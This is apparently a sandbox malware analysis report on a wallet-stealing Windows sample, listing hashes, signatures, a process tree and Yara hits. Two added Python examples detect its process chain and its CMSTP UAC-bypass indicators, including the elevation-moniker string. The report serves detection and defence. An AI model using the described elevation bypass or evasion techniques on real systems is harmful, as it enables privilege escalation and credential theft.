
Windows Analysis Report
KClGcCpDAP.exe

Overview

General Information

Sample name: KClGcCpDAP.exe (renamed because the original name is a hash value)
Original sample name: 61d2baf57c3ed6eda2d72720fc54ed04.exe
Analysis ID: 1527626
MD5: 61d2baf57c3ed6eda2d72720fc54ed04
SHA1: 8c6ce6dc798b3d085102b96ffea2913efe5fb243
SHA256: 08e1d8d41bef83310ed290e5b8b3821d7ead8f66709c90cd4caa27c567ab4e80
Tags: exe, user-abuse_ch

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • KClGcCpDAP.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\KClGcCpDAP.exe" MD5: 61D2BAF57C3ED6EDA2D72720FC54ED04)
    • KClGcCpDAP.exe (PID: 7152 cmdline: "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544 MD5: 4ED56BCA0F099784A4A341321C3D0695)
      • Virtual.exe (PID: 6188 cmdline: "C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe" MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
        • Virtual.exe (PID: 396 cmdline: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
          • cmd.exe (PID: 6036 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • validPower_Lnz_x64.exe (PID: 344 cmdline: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • Virtual.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe" MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
    • cmd.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Virtual.exe (PID: 1312 cmdline: "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe" MD5: C8A2DE7077F97D4BCE1A44317B49EF41)
    • cmd.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • validPower_Lnz_x64.exe (PID: 4960 cmdline: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe MD5: 967F4470627F823F4D7981E511C9824F)
No configs have been found
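The process tree above is the most reusable part of the report: the outer KClGcCpDAP.exe is a WiX Burn bootstrapper (burn.pdb and the -burn.clean.room switch), it re-executes itself from a GUID-named directory under C:\Windows\Temp, starts Virtual.exe from the bundle's .ba staging directory, which starts a copy of itself from AppData\Roaming\TlsCloud_WRv3_x64, which launches cmd.exe, which launches validPower_Lnz_x64.exe from AppData\Local\Temp. The following is an added example, not code from the report, Joe Sandbox or the sample, showing how to turn that chain into a hunting rule over process-creation events. The ProcEvent records are constructed from the PIDs and image paths listed above (the later re-launches of Virtual.exe are omitted); the rule names and path regexes are the example's own choices.

```python
"""Added example: hunt for the installer -> AppData -> shell -> Temp chain the sandbox tree shows."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str


# Constructed from the process tree in the report (PIDs and image paths as listed there).
SANDBOX_TREE = [
    ProcEvent(7072, 0, r"C:\Users\user\Desktop\KClGcCpDAP.exe"),
    ProcEvent(7152, 7072, r"C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe"),
    ProcEvent(6188, 7152, r"C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"),
    ProcEvent(396, 6188, r"C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"),
    ProcEvent(6036, 396, r"C:\Windows\SysWOW64\cmd.exe"),
    ProcEvent(2916, 6036, r"C:\Windows\system32\conhost.exe"),
    ProcEvent(344, 6036, r"C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe"),
]

# User-writable locations that need no elevation to drop into (assumed rule scope).
USER_WRITABLE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\(Roaming|Local\\Temp)\\", re.IGNORECASE)
# The GUID-named staging directory a Burn bundle extracts itself into.
INSTALLER_STAGING = re.compile(r"^[A-Z]:\\Windows\\Temp\\\{[0-9A-F-]{36}\}\\", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def chain(events: list[ProcEvent], pid: int) -> list[str]:
    """Image basenames from the root ancestor down to pid (the tree line for one process)."""
    index = {e.pid: e for e in events}
    names = []
    while pid in index:
        names.append(basename(index[pid].image))
        pid = index[pid].ppid
    return list(reversed(names))


def hunt(events: list[ProcEvent]) -> list[tuple[str, int, int]]:
    """Return (rule, parent_pid, child_pid) for each match of the two chain patterns."""
    index = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = index.get(e.ppid)
        if parent is None:
            continue
        # Rule 1: a process running from the installer's Windows\Temp\{GUID} staging
        # directory starts a binary that lives in a user-writable persistence path.
        if INSTALLER_STAGING.match(parent.image) and USER_WRITABLE.match(e.image):
            findings.append(("staging_dir_to_appdata", parent.pid, e.pid))
        # Rule 2: an AppData-resident process launches a shell, and that shell launches
        # yet another executable from a user-writable path (the validPower_Lnz_x64.exe hop).
        if basename(e.image).lower() in SHELLS and USER_WRITABLE.match(parent.image):
            for child in events:
                if child.ppid == e.pid and USER_WRITABLE.match(child.image):
                    findings.append(("appdata_shell_launches_temp_exe", parent.pid, child.pid))
    return findings


if __name__ == "__main__":
    for rule, ppid, pid in hunt(SANDBOX_TREE):
        print(rule, ppid, "->", pid, " | ".join(chain(SANDBOX_TREE, pid)))
```

Both rules key on the parent's location rather than the child's name, so renaming Virtual.exe or validPower_Lnz_x64.exe does not evade them; a legitimate installer that launches cmd.exe from Program Files produces no findings.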
Yara matches (memory dumps):

Source | Rule | Description | Author | Strings
00000011.00000002.2272761676.000000000361D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000003.00000002.1778571972.0000000003DF6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000002.00000002.1722899571.0000000003F99000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000C.00000002.2216100615.0000000003390000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000B.00000002.2162614521.0000000003A96000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Further entries are collapsed in the original report.

Yara matches (unpacked PE files):

Source | Rule | Description | Author | Strings
20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | 0x25f23a:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}; 0x25f2c5:$s1: CoGetObject; 0x25f21e:$s2: Elevation:Administrator!new:
12.2.cmd.exe.33907f8.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
12.2.cmd.exe.33907f8.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | 0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}; 0x10f28:$s2: Elevation:Administrator!new:
10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Further entries are collapsed in the original report.
                  No Sigma rule has matched
                  No Suricata rule has matched
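The ditekSHen hits above are driven by three strings: the CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, the CoGetObject import name, and the "Elevation:Administrator!new:" moniker prefix that asks the COM elevation service to start that class with an administrator token (the CMSTP auto-elevation path, T1218.003). The following is an added example, not code from the report or from either Yara rule, that locates those same indicators in a raw buffer in both ASCII and UTF-16LE form and renders them in the report's offset:$name style. The sample buffer is constructed here to stand in for an unpacked PE or memory dump; the match condition in is_cmstp_uac_bypass is an assumption modelled on the cmd.exe hit above (which matched only $guid1 and $s2), not the rule's real condition, which is not on the page.

```python
"""Added example: find the CMSTP COM elevation-moniker indicators in a buffer."""

# The three strings the INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM hits list.
# guid1 is the CLSID the moniker instantiates through CoGetObject.
CMSTP_INDICATORS = {
    "guid1": "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",
    "s1": "CoGetObject",
    "s2": "Elevation:Administrator!new:",
}

# Search both encodings: Windows APIs consume the moniker as UTF-16 (Yara "wide"),
# while import names and some string tables are plain ASCII.
ENCODINGS = (("ascii", "ascii"), ("wide", "utf-16-le"))


def _find_all(buf: bytes, needle: bytes) -> list[int]:
    """Every offset of needle in buf, including overlapping ones."""
    offsets, i = [], buf.find(needle)
    while i != -1:
        offsets.append(i)
        i = buf.find(needle, i + 1)
    return offsets


def find_cmstp_indicators(buf: bytes) -> dict[str, list[tuple[int, str]]]:
    """{indicator name: [(offset, 'ascii' | 'wide'), ...]} for every hit in buf."""
    hits: dict[str, list[tuple[int, str]]] = {}
    for name, text in CMSTP_INDICATORS.items():
        for label, codec in ENCODINGS:
            for off in _find_all(buf, text.encode(codec)):
                hits.setdefault(name, []).append((off, label))
    return hits


def is_cmstp_uac_bypass(hits: dict[str, list[tuple[int, str]]]) -> bool:
    """Assumed condition: CLSID plus moniker prefix, as in the report's cmd.exe hit."""
    return "guid1" in hits and "s2" in hits


def format_hits(hits: dict[str, list[tuple[int, str]]]) -> list[str]:
    """Render hits the way the report does, e.g. '0x25f23a:$guid1: {3E5F...}', ordered by offset."""
    rows = [(off, f"0x{off:x}:${name}: {CMSTP_INDICATORS[name]} ({label})")
            for name, entries in hits.items() for off, label in entries]
    return [text for _, text in sorted(rows)]


def build_sample_buffer() -> bytes:
    """Constructed stand-in for an unpacked PE image: filler around the three strings,
    with the moniker stored wide and the other two ASCII."""
    pad = b"\x90" * 64
    return (pad
            + CMSTP_INDICATORS["s2"].encode("utf-16-le")   # 56 bytes at offset 64
            + pad
            + CMSTP_INDICATORS["guid1"].encode("ascii")    # 38 bytes at offset 184
            + pad
            + CMSTP_INDICATORS["s1"].encode("ascii")       # 11 bytes at offset 286
            + pad)


if __name__ == "__main__":
    found = find_cmstp_indicators(build_sample_buffer())
    print("\n".join(format_hits(found)), "\nbypass:", is_cmstp_uac_bypass(found))
```

Run against the .raw.unpack dumps the report names, the offsets line up with the Strings column; against a memory region of a process that merely imports CoGetObject (many COM clients do) only $s1 fires, which is why the assumed condition ignores it.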


                  AV Detection

Source: KClGcCpDAP.exe | Virustotal: Detection: 8%
Source: KClGcCpDAP.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 93.2% probability
Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_0088A0BB DecryptFileW,0_2_0088A0BB
Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_008AFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_008AFA62
Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_00889E9E DecryptFileW,DecryptFileW,0_2_00889E9E
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_00D1A0BB DecryptFileW,1_2_00D1A0BB
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_00D3FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_00D3FA62
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_00D19E9E DecryptFileW,DecryptFileW,1_2_00D19E9E

                  Exploits

Source: Yara match | File source: 20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.cmd.exe.33907f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.cmd.exe.3364a08.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.validPower_Lnz_x64.exe.2604a20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.validPower_Lnz_x64.exe.26726ed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.validPower_Lnz_x64.exe.262ca20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.validPower_Lnz_x64.exe.2649aed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.2272761676.000000000361D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1778571972.0000000003DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1722899571.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2216100615.0000000003390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2162614521.0000000003A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2217981386.000000000554C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2475629890.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2022025745.0000000005366000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2662759098.0000000002626000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2221794602.00000000025FE000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: KClGcCpDAP.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | File opened: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dll
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: KClGcCpDAP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: msvcp100.amd64.pdb source: Virtual.exe, 00000002.00000003.1711778991.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724662734.00000000665EF000.00000002.00000001.01000000.0000000C.sdmp, Virtual.exe, 00000003.00000002.1780293522.000000006646F000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxDDU\VBoxDDU.pdb source: Virtual.exe, 00000002.00000002.1726253927.00007FFE0E175000.00000002.00000001.01000000.00000009.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1781691145.00007FFE01345000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: msvcr100.amd64.pdb source: Virtual.exe, 00000002.00000003.1712097641.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1724966337.00000000666D1000.00000002.00000001.01000000.0000000A.sdmp, Virtual.exe, 00000003.00000002.1780499574.0000000066551000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxSVC\VBoxSVC.pdb source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: ntdll.pdb source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 
0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower_Ln
                  Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: Virtual.exe, 00000002.00000002.1723901134.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000002.00000002.1723366926.0000000004262000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779142264.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779322698.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1779530074.00000000046C3000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223382909.0000000003C67000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225791718.0000000005466000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223754045.0000000004065000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226734814.0000000005E69000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224913907.0000000004C63000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225569136.0000000005265000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221493011.00000000021BA000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224527435.000000000486F000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226037437.000000000566C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231554808.0000000006869000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223213519.0000000003A61000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231176665.000000000646A000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 
0000000A.00000002.2231723937.0000000006A68000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224103581.000000000446D000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2224699045.0000000004A60000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2232229859.0000000007064000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2226981468.000000000606C000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2231892691.0000000006C64000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2229784780.0000000006260000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2222209839.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2223555876.0000000003E66000.00000004.00000001.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2225140894.0000000004E67000.00000004.00000001.00020000.00000000.sdmp, validPower
                  Source: Binary string: D:\tinderbox\win-4.2\out\win.amd64\release\obj\VBoxRT\VBoxRT.pdb source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: wntdll.pdb source: cmd.exe, 00000004.00000002.2022484937.0000000005630000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2021878982.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_00873CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00873CC4
Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_008B4440 FindFirstFileW,FindClose,0_2_008B4440
Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_00889B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00889B43
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_00D44440 FindFirstFileW,FindClose,1_2_00D44440
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_00D19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00D19B43
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_00D03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00D03CC4
